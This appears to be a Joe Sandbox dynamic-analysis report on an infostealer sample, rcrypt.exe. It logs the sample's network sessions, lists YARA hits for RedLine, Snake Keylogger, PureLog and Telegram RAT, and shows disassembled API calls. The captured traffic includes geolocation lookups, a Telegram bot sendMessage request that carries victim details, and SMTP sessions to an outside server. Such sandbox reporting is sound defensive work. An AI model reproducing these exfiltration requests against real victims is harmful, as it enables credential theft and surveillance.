2024-07-24 12:47:36 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-24 12:47:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49716	188.114.96.3	443	7692	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 12:47:37 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-24 12:47:38 UTC	704	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 12:47:37 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 8 Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xmbBegZYSim6P%2FvU8MzmFDQnpHYtJmiHPot5qtIt%2FLxKAy7%2Bdf1yLBrlB7AmoWxKYzNhyxKt7wx3CIPN97DCcbkW3Gn79%2FPRC4QZRIFWrakaQl4VYi3g2YAndjtivv9JwGPY6v8q"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8405164fc45e7c-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 12:47:38 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-24 12:47:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49718	188.114.96.3	443	7692	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 12:47:39 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-24 12:47:39 UTC	703	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 12:47:39 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 10 Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BoJTyicCyiBJNzGVE0iYd6c8x6gIHQNBo81NktV3ADF7yfW1Q2E7QaY%2Bt6i5m%2Bnmi8Qnab1bLxfIKeg4njTi0PDHT1X7R0YrqhvJkkH2DaT9GU82vIYAmduVAhlFLYrv47ZCZ2kz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8405218c720f81-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 12:47:39 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-24 12:47:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49720	188.114.96.3	443	7692	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 12:47:40 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-24 12:47:41 UTC	707	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 12:47:41 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 12 Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Agbbnruy9%2BEFMjfiBW7UBCPrhyTa7uRI%2F3GfE2lSslS5AOcMGYE%2F2ewEuEkYgu1Esgm8R9eF0dH5c2I2eHF7ZqGvkcAAPQ7Hwq1r0peWbW4or2nXqLunkO6Oi4e%2BM8uyJZBPBT7%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8405296dd97cae-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 12:47:41 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-24 12:47:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49722	188.114.96.3	443	7692	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 12:47:43 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-24 12:47:43 UTC	703	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 12:47:43 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 14 Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NdMKheATHhNeMBwBUoaNCAkmg71MXgMxGYutHcJ2i%2F269WgDCX5oEEzN46d5czkRPWIr47AXfugRuHj0sMbd2gAKScxZfQeMz7XD00v2oTdJf%2Be89kdf5RW4Sz%2BpgT0SBqGieJyh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8405386cc243f8-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 12:47:43 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-24 12:47:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.9	49725	149.154.167.220	443	7692	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 12:47:44 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:849224%0D%0ADate%20and%20Time:%2025/07/2024%20/%2001:28:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20849224%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-07-24 12:47:44 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Wed, 24 Jul 2024 12:47:44 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-07-24 12:47:44 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jul 24, 2024 14:48:01.534640074 CEST	587	58267	202.4.96.3	192.168.2.9	220-whm.amberit.net ESMTP Exim 4.96.2 #2 Wed, 24 Jul 2024 18:48:01 +0600 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jul 24, 2024 14:48:01.534882069 CEST	58267	587	192.168.2.9	202.4.96.3	EHLO 849224
Jul 24, 2024 14:48:05.121339083 CEST	587	58267	202.4.96.3	192.168.2.9	250-whm.amberit.net Hello 849224 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Jul 24, 2024 14:48:05.121558905 CEST	58267	587	192.168.2.9	202.4.96.3	STARTTLS
Jul 24, 2024 14:48:06.968308926 CEST	587	58267	202.4.96.3	192.168.2.9	220 TLS go ahead
Jul 24, 2024 14:48:06.969791889 CEST	587	58267	202.4.96.3	192.168.2.9	220 TLS go ahead
Jul 24, 2024 14:48:35.880640984 CEST	587	58269	202.4.96.3	192.168.2.9	220-whm.amberit.net ESMTP Exim 4.96.2 #2 Wed, 24 Jul 2024 18:48:35 +0600 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jul 24, 2024 14:48:35.880906105 CEST	58269	587	192.168.2.9	202.4.96.3	EHLO 849224
Jul 24, 2024 14:48:37.436939001 CEST	587	58269	202.4.96.3	192.168.2.9	250-whm.amberit.net Hello 849224 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Jul 24, 2024 14:48:37.437124968 CEST	58269	587	192.168.2.9	202.4.96.3	STARTTLS
Jul 24, 2024 14:48:38.948863029 CEST	587	58269	202.4.96.3	192.168.2.9	220 TLS go ahead

Target ID:	0
Start time:	08:47:23
Start date:	24/07/2024
Path:	C:\Users\user\Desktop\rcrypt.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\rcrypt.exe"
Imagebase:	0xf0000
File size:	1'155'072 bytes
MD5 hash:	F91E3211D607A74A7635027718DD9701
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.1319524168.00000000033B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:47:24
Start date:	24/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\rcrypt.exe"
Imagebase:	0x7b0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3774685263.0000000004006000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.3774685263.0000000004006000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.3769801925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.3772899142.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3772899142.000000000306F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	4%
Dynamic/Decrypted Code Coverage:	1.3%
Signature Coverage:	6.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	170

Executed Functions

Function 000F3B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000F3B7A
IsDebuggerPresent.KERNEL32 ref: 000F3B8C
GetFullPathNameW.KERNEL32(00007FFF,?,?,001B62F8,001B62E0,?,?), ref: 000F3BFD

Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66

Part of subcall function 00100A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,000F3C26,001B62F8,?,?,?), ref: 00100ACE

SetCurrentDirectoryW.KERNEL32(?), ref: 000F3C81
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,001A93F0,00000010), ref: 0012D4BC
SetCurrentDirectoryW.KERNEL32(?,001B62F8,?,?,?), ref: 0012D4F4
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,001A5D40,001B62F8,?,?,?), ref: 0012D57A
ShellExecuteW.SHELL32(00000000,?,?), ref: 0012D581

Part of subcall function 000F3A58: GetSysColorBrush.USER32(0000000F), ref: 000F3A62
Part of subcall function 000F3A58: LoadCursorW.USER32(00000000,00007F00), ref: 000F3A71
Part of subcall function 000F3A58: LoadIconW.USER32(00000063), ref: 000F3A88
Part of subcall function 000F3A58: LoadIconW.USER32(000000A4), ref: 000F3A9A
Part of subcall function 000F3A58: LoadIconW.USER32(000000A2), ref: 000F3AAC
Part of subcall function 000F3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000F3AD2
Part of subcall function 000F3A58: RegisterClassExW.USER32(?), ref: 000F3B28

Part of subcall function 000F39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000F3A15
Part of subcall function 000F39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000F3A36
Part of subcall function 000F39E7: ShowWindow.USER32(00000000,?,?), ref: 000F3A4A
Part of subcall function 000F39E7: ShowWindow.USER32(00000000,?,?), ref: 000F3A53

Part of subcall function 000F43DB: _memset.LIBCMT ref: 000F4401
Part of subcall function 000F43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 000F44A6

Strings

This is a third-party compiled AutoIt script., xrefs: 0012D4B4
runas, xrefs: 0012D575

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: 9a452a1460e3b4a1ce746443081e1bdc64fc0962fb336adf2ed6ee89c19aa121
Instruction ID: 2bf4cf3c94f812f4c6824e753790bc84d29feab5de459420710f066cb8b7c53c
Opcode Fuzzy Hash: 9a452a1460e3b4a1ce746443081e1bdc64fc0962fb336adf2ed6ee89c19aa121
Instruction Fuzzy Hash: 7E51293090824CAEDF11EBB4EC05EFE7B74EF14310F0441B9F655669A2CB784A86EB61

Function 000F4AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 000F4B2B

Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66

GetCurrentProcess.KERNEL32(?,0017FAEC,00000000,00000000,?), ref: 000F4BF8
IsWow64Process.KERNEL32(00000000), ref: 000F4BFF
GetNativeSystemInfo.KERNELBASE(00000000), ref: 000F4C45
FreeLibrary.KERNEL32(00000000), ref: 000F4C50
GetSystemInfo.KERNEL32(00000000), ref: 000F4C81
GetSystemInfo.KERNEL32(00000000), ref: 000F4C8D

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 70dafb64afe295a6a750c9ccc40835f69dc4c6cdb658db5e09726aa8b4905d1c
Instruction ID: e4f04ce64b0c62572a9d298197832a28416b75101947070ea9426f04d536591a
Opcode Fuzzy Hash: 70dafb64afe295a6a750c9ccc40835f69dc4c6cdb658db5e09726aa8b4905d1c
Instruction Fuzzy Hash: BA91C53154A7C4DEC731CB68A5611BBBFE4AF2A300B48499DD5CA93E42D320E948D75A

Function 000F4FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,000F4EEE,?,?,00000000,00000000), ref: 000F4FF9
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,000F4EEE,?,?,00000000,00000000), ref: 000F5010
LoadResource.KERNEL32(?,00000000,?,?,000F4EEE,?,?,00000000,00000000,?,?,?,?,?,?,000F4F8F), ref: 0012DD60
SizeofResource.KERNEL32(?,00000000,?,?,000F4EEE,?,?,00000000,00000000,?,?,?,?,?,?,000F4F8F), ref: 0012DD75
LockResource.KERNEL32(000F4EEE,?,?,000F4EEE,?,?,00000000,00000000,?,?,?,?,?,?,000F4F8F,00000000), ref: 0012DD88

Strings

SCRIPT, xrefs: 000F5006

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
